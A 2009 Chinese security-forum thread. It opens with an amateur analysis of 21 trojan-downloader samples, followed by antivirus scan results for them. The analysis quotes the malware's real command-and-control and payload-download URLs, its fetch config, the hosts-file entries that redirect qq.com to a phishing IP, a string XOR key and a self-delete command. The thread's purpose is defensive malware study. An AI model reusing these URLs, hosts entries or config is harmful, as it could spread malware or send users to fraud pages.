收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 21个
123下一页
返回列表 发新帖
查看: 3347|回复: 23
收起左侧

[病毒样本] 21个

[复制链接]
qianwenxiang
发表于 2009-3-23 18:11:19 | 显示全部楼层 |阅读模式
昨天抓的 都是同类 外带稀里糊涂搞出来的分析……某些部分有点主观臆测了……

程序先使用GetTempPathA、GetSystemDirectoryA来获得临时文件路径、系统目录路径,并为后续操作做准备。
然后程序使用GetCommandLineA获取命令行,如果命令行是-Update则
依次访问如下URL(URL上面一行为程序中作者的解释):
ConfigURL
Stack ss:[0012FF88]=01080A04, (ASCII "http://www.qin58.cn/down444.txt")

StatCountURL
Stack ss:[0012FF7C]=01082048, (ASCII "http://www.qin58.cn/count.asp")

ExeCountURL
Stack ss:[0012FF74]=01082180, (ASCII "http://www.qin58.cn/execount.asp")

ExistsCountURL
Stack ss:[0012FF6C]=0108228C, (ASCII "http://www.qin58.cn/Being.asp")

ResetCountURL
Stack ss:[0012FF64]=01082424, (ASCII "http://www.qin58.cn/active.asp")

配置文件包含以下数据

<Config DelayTimer="180" CheckTimer="1" ExeCount="1" ResetCount="1"></Config>
<UpdateURL Ver="20090315" Sleep="1000">http://www.qin58.cn/user/down/1011.exe&lt;/UpdateURL>
<CountURL Switch="1"></CountURL>
<File1 Run="0" Max="1" Sleep="0" NoExists="%Temp%\qin581" Name="qin581" ExeVer="22" UserID="">http://www.qin58.cn/hosts.txt&lt;/File1>
<File2 Run="1" Max="99" Sleep="0" NoExists="" Name="qin58" ExeVer="9" UserID="">http://www.qin58.cn/qin58.htm&lt;/File2>

第一行Config的数据,程序将在后面的配置中逐条匹配,第二行显示的是最新版本和下载地址以及休眠时间
第四行是恶意HOSTS的地址,程序会用下列数据(截取有效部分)覆盖系统HOST:

208.43.166.150       www.qq.com
208.43.166.150       qq.com

这样,每当打开qq.com就会自动指向208.43.166.150。而这个IP指向的网页是一个欺骗网页,他会欺骗用户说腾讯的活动,用户中奖了,将会指引用户访问:hxp://www.qqitq.cn/,并骗取所谓的“扣税”和“运输费”。

第五行是一个PE文件,是由VB编写的一个木马。

然后程序将使用以下信息检测ID
CheckID: cmdjiami
UserID: 1019 *=exe名

使用FileCopyA函数复制自己到C:\WINDOWS\system32\qin58.exe,并创建recordini.ini,C:\WINDOWS\Temp\~xnnvi.dat,C:\WINDOWS\system32\qin58.ini,C:\WINDOWS\ResetTest.txt。

下载的文件,程序将保存到:C:\WINDOWS\Temp\~qin58.exe.Update,并且创建一个C:\WINDOWS\Temp\~qin58.exe.bak!防止更新失败。

然后程序将载入一些加密数据,例如
0040A413    B8 18CC4000     mov     eax, 0040CC18                   ; ASCII "qg|cpgfIWppe;flf"
根据代码容易知道他的Xor Key是 21d(15h)。
即“drivers\beep.sys”

他会试图覆盖beep.sys并释放驱动恢复ssdt。

然后他使用SetFileAttributesA函数设置qin58.exe属性为HIDDEN+SYSTEM,接着以-Start为参数启动qin58.exe,qin58.exe启动后会注入dllhost.exe并试图下载上文提及到的pe文件。

最后程序创建启动项qin58.exe指向system32\qin58.exe

并执行如下命令删除原始文件
"cmd /c erase /F /A ""[SAMPLE]"" > nul"

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Sebastian
发表于 2009-3-23 18:14:23 | 显示全部楼层
清空
Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'D:\new\new'
D:\new\new\1001_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f7615b.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1002_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4880c7b4.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1003_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f7615d.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1004_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4880c7b6.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1005_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f7615f.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1006_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4880c788.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1007_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f7615c.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1008_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4880c7b5.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1009_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f7615e.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1010_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f8615c.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1011_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 488fc7b5.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1012_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f8615e.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1013_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 488fc7b7.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1014_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f86150.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1015_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 488fc7b9.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1016_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f86152.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1017_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 488fc7bb.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1018_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f8615d.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1019_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 488fc7b6.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\1020_0.exe
    [FUND]      Ist das Trojanische Pferd TR/Spy.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f9615d.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
D:\new\new\qin58.exe
    [FUND]      Enthält ein Erkennungsmuster des (gefährlichen) Backdoorprogrammes BDS/Backdoor.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4a356196.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.


Ende des Suchlaufs: 2009年3月23日  18:15
Benötigte Zeit: 00:01 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

      1 Verzeichnisse wurden überprüft
     21 Dateien wurden geprüft
     21 Viren bzw. unerwünschte Programme wurden gefunden
      0 Dateien wurden als verdächtig eingestuft
     21 Dateien wurden gelöscht
      0 Viren bzw. unerwünschte Programme wurden repariert
     21 Dateien wurden in die Quarantäne verschoben
      0 Dateien wurden umbenannt
      0 Dateien konnten nicht durchsucht werden
      0 Dateien ohne Befall
      0 Archive wurden durchsucht
      0 Warnungen
     21 Hinweise
回复

举报

揍敌客
发表于 2009-3-23 18:44:34 | 显示全部楼层
ik miss 1
回复

举报

ledled
发表于 2009-3-23 18:47:54 | 显示全部楼层
ALL to VB
回复

举报

黑衣~魂
发表于 2009-3-23 19:06:11 | 显示全部楼层
DR.WEB MISS 1-TO
回复

举报

Palkia
发表于 2009-3-23 19:20:37 | 显示全部楼层
瑞星
Trojan.Win32.Syshijack.f   X20

VBCode.hk   X1

回复

举报

darreol
发表于 2009-3-23 19:25:08 | 显示全部楼层




我怀疑只是F-Secure AVP起作用



扫描报告2009年3月23日 19:24:40 - 19:24:43计算机名称: SAMSUNG-PC
扫描类型: 扫描目标
目标: C:\Users\samsung\Desktop\vv21.rar
结果: 找到 20 恶意软件Trojan.Win32.Agent2.get (病毒)
  • C:\Users\samsung\Desktop\vv21.rar\1001_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1002_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1003_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1004_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1005_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1006_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1007_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1008_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1009_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1010_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1011_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1012_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1013_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1014_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1015_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1016_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1017_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1018_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1019_0.exe
  • C:\Users\samsung\Desktop\vv21.rar\1020_0.exe



统计信息已扫描:
  • 文件: 22
  • 未扫描: 0
结果:
  • 病毒: 20
  • 间谍软件: 0
  • 可疑项目: 0
  • 危险软件: 0
操作:
  • 已杀毒: 0
  • 已重命名: 0
  • 删除: 0
  • 已隔离: 0
  • 失败: 0
启动扇区:
  • 已扫描: 0
  • 受感染: 0
  • 可疑项目: 0
  • 已杀毒: 0

选项定义版本:
  • 病毒: 2009-03-23_03
  • 间谍软件: 2009-03-23_03
扫描引擎:
  • F-Secure AVP: 7.00.171, 2009-03-23
  • F-Secure Hydra: 3.08.9080, 2009-03-20
扫描选项:
  • 扫描定义的文件: COM EXE SYS OV? BIN SCR DLL SHS HTM HTML HTT VBS JS INF VXD DO? XL? RTF CPL WIZ HTA PP? PWZ P?T MSO PIF . ACM ASP AX CNV CSC DRV INI MDB MPD MPP MPT OBD OBT OCX PCI TLB TSP WBK WBT WPC WSH VWP WML BOO HLP TD0 TT6 MSG ASD JSE VBE WSC CHM EML PRC SHB LNK WSF {* PDF ZL? XML ANI AVB BAT CEO CMD JOB JPG LSP MAP MHT MIF PHP POT SWF WMF NWS TAR TGZ ZIP JAR ARJ LZH TAR TGZ GZ CAB RAR BZ2 HQX
  • 扫描内部存档
操作:
  • 病毒: 扫描后询问
  • 间谍软件: 扫描后询问
    版权 © 1998-2008 产品支持 | 发送病毒样本到 F-Secure对于 F-Secure 万维网页面上所链接的由第三方创建和发布的材料, F-Secure 不承担任何责任。除非已通过电子邮件或 F-Secure CGI 电子邮件向任一台服务器提交材料以清楚说明情况, 除非您明确表示(如使用电子邮件或通过我们的 F-Secure CGI 电子邮件),通过 F-Secure 万维网页或硬拷贝发布已有的材料。 单击带下划线的链接,可访问 F-Secure 公共网站。此时,系统会在专用访问统计信息中用域名记录您的访问。此信息不会提供给任何第三方。您同意不针对所提交的材料向我们提出诉讼。除非您已明确说明,否则应提交材料以保证 F-Secure 针对可能在 F-Secure 产品/出版物中采用的概念,不承担任何责任。 


[ 本帖最后由 darreol 于 2009-3-23 19:26 编辑 ]
回复

举报

linqing
发表于 2009-3-23 19:34:54 | 显示全部楼层
反病毒引擎版本最后更新扫描结果
a-squared4.0.0.1012009.03.23Trojan-Dropper.Delf!IK
AhnLab-V35.0.0.22009.03.23Win-Trojan/Hupigon.Gen
AntiVir7.9.0.1202009.03.23TR/Spy.Gen
Authentium5.1.2.42009.03.23W32/Agent.S.gen!Eldorado
Avast4.8.1335.02009.03.23
AVG8.5.0.2832009.03.23Dropper.Generic.AJSW
BitDefender7.22009.03.23Generic.Malware.SFdldspg.AC788A3D
CAT-QuickHeal10.002009.03.23
ClamAV0.94.12009.03.23
Comodo10802009.03.22
DrWeb4.44.0.091702009.03.23DLOADER.Trojan
eSafe7.0.17.02009.03.19Suspicious File
eTrust-Vet31.6.64122009.03.23
F-Prot4.4.4.562009.03.23W32/Agent.S.gen!Eldorado
F-Secure8.0.14470.02009.03.23Trojan.Win32.Agent2.get
Fortinet3.117.0.02009.03.23PossibleThreat
GData192009.03.23Generic.Malware.SFdldspg.AC788A3D
IkarusT3.1.1.48.02009.03.23Trojan-Dropper.Delf
K7AntiVirus7.10.6782009.03.21Trojan.Win32.Malware.1
Kaspersky7.0.0.1252009.03.23Trojan.Win32.Agent2.get
McAfee55612009.03.22
McAfee+Artemis55612009.03.22Generic!Artemis
McAfee-GW-Edition6.7.62009.03.23Trojan.Spy.Gen
Microsoft1.45022009.03.23Trojan:Win32/SystemHijack.gen
NOD3239532009.03.21a variant of Win32/Injector.DY
Norman6.00.062009.03.20
nProtect2009.1.8.02009.03.23
Panda10.0.0.102009.03.22Trj/CI.A
Prevx1V22009.03.23
Rising21.22.02.002009.03.23Trojan.Win32.SysHijack.f
Sophos4.39.02009.03.23Mal/Behav-024
Sunbelt3.2.1858.22009.03.22Backdoor.Backdoor.Gen
Symantec1.4.4.122009.03.23
TheHacker6.3.3.4.2872009.03.23
TrendMicro8.700.0.10042009.03.23PAK_Generic.001
VBA323.12.10.12009.03.23MalwareScope.Trojan-PSW.Game.7
ViRobot2009.3.23.16592009.03.23
VirusBuster4.6.5.02009.03.22
回复

举报

kingmuro
头像被屏蔽
发表于 2009-3-23 19:45:13 | 显示全部楼层

BD 20个

文件或对象名称 病毒名称 最终处理状态
E:\My Documents\桌面\test\vv21\1001_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1002_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1003_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1004_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1005_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1006_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1007_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1008_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1009_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1010_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1011_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1012_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1013_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1014_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1015_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1016_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1017_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1018_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1019_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
E:\My Documents\桌面\test\vv21\1020_0.exe Generic.Malware.SFdldspg.AC788A3D 已移动至隔离区
回复

举报

BING126
头像被屏蔽
发表于 2009-3-23 21:00:32 | 显示全部楼层
McAfee miss
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-7 02:10 , Processed in 0.509043 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表